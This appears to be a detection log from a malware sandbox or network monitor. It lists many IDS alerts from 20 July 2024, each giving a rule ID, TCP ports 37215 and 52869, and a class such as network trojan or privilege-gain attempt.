                      Timestamp:07/20/24-23:05:38.951134
                      SID:2829579
                      Source Port:35198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.975364
                      SID:2025132
                      Source Port:49298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.445837
                      SID:2027339
                      Source Port:59990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.772622
                      SID:2027339
                      Source Port:60124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.546679
                      SID:2831300
                      Source Port:54492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2831300
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2027339
                      Source Port:50252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.583817
                      SID:2025132
                      Source Port:39788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2829579
                      Source Port:48262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.627679
                      SID:2025132
                      Source Port:49070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2831300
                      Source Port:33566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.402930
                      SID:2835222
                      Source Port:39030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.760150
                      SID:2027339
                      Source Port:48626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.832966
                      SID:2025132
                      Source Port:56580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:36008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.508651
                      SID:2027339
                      Source Port:42586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2829579
                      Source Port:59462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.169080
                      SID:2027339
                      Source Port:40670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2829579
                      Source Port:44460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.181822
                      SID:2025132
                      Source Port:34386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.445623
                      SID:2831300
                      Source Port:57442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2829579
                      Source Port:46540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2027339
                      Source Port:51170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.143329
                      SID:2027339
                      Source Port:32932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.759654
                      SID:2027339
                      Source Port:49420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.707199
                      SID:2025132
                      Source Port:57096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.224112
                      SID:2027339
                      Source Port:55408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.188277
                      SID:2829579
                      Source Port:54726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.061893
                      SID:2835222
                      Source Port:40774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.224203
                      SID:2027339
                      Source Port:38778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.325754
                      SID:2829579
                      Source Port:54136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2829579
                      Source Port:59726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.851987
                      SID:2027339
                      Source Port:43776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.607368
                      SID:2025132
                      Source Port:36944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.384826
                      SID:2027339
                      Source Port:41148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.107529
                      SID:2025132
                      Source Port:41924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.864699
                      SID:2025132
                      Source Port:56854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2027339
                      Source Port:54168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.078658
                      SID:2025132
                      Source Port:42594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2835222
                      Source Port:51442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:48.642445
                      SID:2027339
                      Source Port:57946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2829579
                      Source Port:55760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2835222
                      Source Port:49190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.459685
                      SID:2831300
                      Source Port:43962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.091054
                      SID:2027339
                      Source Port:38710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.891482
                      SID:2027339
                      Source Port:47532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.620376
                      SID:2027339
                      Source Port:34974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.639265
                      SID:2027339
                      Source Port:54412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.472907
                      SID:2025132
                      Source Port:38052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2829579
                      Source Port:56640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.009825
                      SID:2027339
                      Source Port:52926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.697720
                      SID:2831300
                      Source Port:39698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2831300
                      Source Port:55330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.006350
                      SID:2027339
                      Source Port:56626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:57942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440434
                      SID:2831300
                      Source Port:46662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.223856
                      SID:2027339
                      Source Port:36444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.132088
                      SID:2027339
                      Source Port:56762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.522075
                      SID:2831300
                      Source Port:54122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:36.969912
                      SID:2831300
                      Source Port:36748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.662426
                      SID:2027339
                      Source Port:56560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.037863
                      SID:2027339
                      Source Port:54284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.515617
                      SID:2831300
                      Source Port:37716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.402809
                      SID:2831300
                      Source Port:57880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.805828
                      SID:2829579
                      Source Port:38814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.116146
                      SID:2831300
                      Source Port:34916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.449442
                      SID:2831300
                      Source Port:41036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.093159
                      SID:2831300
                      Source Port:57862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.277784
                      SID:2831300
                      Source Port:34260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:51.309417
                      SID:2025132
                      Source Port:59684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.439868
                      SID:2027339
                      Source Port:41746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2027339
                      Source Port:54574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.486669
                      SID:2027339
                      Source Port:55360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2027339
                      Source Port:41114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2829579
                      Source Port:57314
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.454187
                      SID:2831300
                      Source Port:51734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:33.386710
                      SID:2025132
                      Source Port:34548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.395251
                      SID:2831300
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:57632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343631
                      SID:2829579
                      Source Port:55278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.467179
                      SID:2831300
                      Source Port:56310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:40066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.544144
                      SID:2831300
                      Source Port:42438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2027339
                      Source Port:49528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.383849
                      SID:2829579
                      Source Port:39464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.258673
                      SID:2027339
                      Source Port:47128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.051106
                      SID:2027339
                      Source Port:37834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.093158
                      SID:2027339
                      Source Port:51660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:52616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:28.154823
                      SID:2027339
                      Source Port:57740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.575886
                      SID:2027339
                      Source Port:53176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.828183
                      SID:2027339
                      Source Port:52354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2831300
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.138503
                      SID:2027339
                      Source Port:54248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.919151
                      SID:2025132
                      Source Port:56030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.174884
                      SID:2831300
                      Source Port:51104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.663367
                      SID:2831300
                      Source Port:41904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.467011
                      SID:2025132
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2027339
                      Source Port:57540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:52560
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.265746
                      SID:2027339
                      Source Port:40496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.487816
                      SID:2027339
                      Source Port:53822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.058741
                      SID:2025132
                      Source Port:33912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2835222
                      Source Port:40050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2829579
                      Source Port:43134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2835222
                      Source Port:40256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2027339
                      Source Port:47784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.968542
                      SID:2027339
                      Source Port:49938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:35238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.414252
                      SID:2025132
                      Source Port:44342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.449873
                      SID:2027339
                      Source Port:56338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.904017
                      SID:2027339
                      Source Port:48780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2835222
                      Source Port:55632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.202225
                      SID:2027339
                      Source Port:55464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.401351
                      SID:2025132
                      Source Port:33218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.271056
                      SID:2831300
                      Source Port:52442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.874908
                      SID:2025132
                      Source Port:52612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.746493
                      SID:2027339
                      Source Port:47190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324298
                      SID:2829579
                      Source Port:39332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2835222
                      Source Port:54196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.754581
                      SID:2025132
                      Source Port:55230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.016775
                      SID:2835222
                      Source Port:58834
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2027339
                      Source Port:36248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.513568
                      SID:2835222
                      Source Port:42618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2027339
                      Source Port:57878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2829579
                      Source Port:55170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.532549
                      SID:2831300
                      Source Port:38754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.994984
                      SID:2025132
                      Source Port:33976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.993750
                      SID:2027339
                      Source Port:50932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.002942
                      SID:2027339
                      Source Port:50834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.146643
                      SID:2025132
                      Source Port:53722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.277784
                      SID:2025132
                      Source Port:56794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.083178
                      SID:2027339
                      Source Port:33620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.467778
                      SID:2025132
                      Source Port:53146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.110617
                      SID:2025132
                      Source Port:50072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2835222
                      Source Port:55656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.435154
                      SID:2027339
                      Source Port:34310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.272088
                      SID:2025132
                      Source Port:57650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.449184
                      SID:2027339
                      Source Port:39860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.383428
                      SID:2027339
                      Source Port:57924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.610184
                      SID:2025132
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.193709
                      SID:2025132
                      Source Port:48146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.818526
                      SID:2831300
                      Source Port:52950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2829579
                      Source Port:40320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2829579
                      Source Port:45368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:58104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.467103
                      SID:2027339
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.744106
                      SID:2027339
                      Source Port:34468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2835222
                      Source Port:37830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.336428
                      SID:2027339
                      Source Port:42884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.171950
                      SID:2831300
                      Source Port:55226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2835222
                      Source Port:53580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2027339
                      Source Port:34264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.495090
                      SID:2027339
                      Source Port:57590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.885283
                      SID:2025132
                      Source Port:53494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.005302
                      SID:2027339
                      Source Port:49570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2027339
                      Source Port:48664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.627679
                      SID:2025132
                      Source Port:58640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.728679
                      SID:2831300
                      Source Port:39104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.516920
                      SID:2831300
                      Source Port:56756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.920702
                      SID:2027339
                      Source Port:40752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.201580
                      SID:2027339
                      Source Port:55266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.051467
                      SID:2025132
                      Source Port:52672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.647376
                      SID:2025132
                      Source Port:43446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.645982
                      SID:2831300
                      Source Port:46170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.930873
                      SID:2027339
                      Source Port:50636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.919897
                      SID:2027339
                      Source Port:45358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2025132
                      Source Port:33780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.482880
                      SID:2831300
                      Source Port:58122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2829579
                      Source Port:54166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2829579
                      Source Port:57628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.974201
                      SID:2027339
                      Source Port:55136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2831300
                      Source Port:51446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.445837
                      SID:2831300
                      Source Port:55210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:20.681117
                      SID:2027339
                      Source Port:60184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.360019
                      SID:2027339
                      Source Port:47744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.306158
                      SID:2027339
                      Source Port:60052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2831300
                      Source Port:50022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.444445
                      SID:2831300
                      Source Port:58972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.674473
                      SID:2027339
                      Source Port:41846
                      Destination Port:52869
                      Protocol:TCP
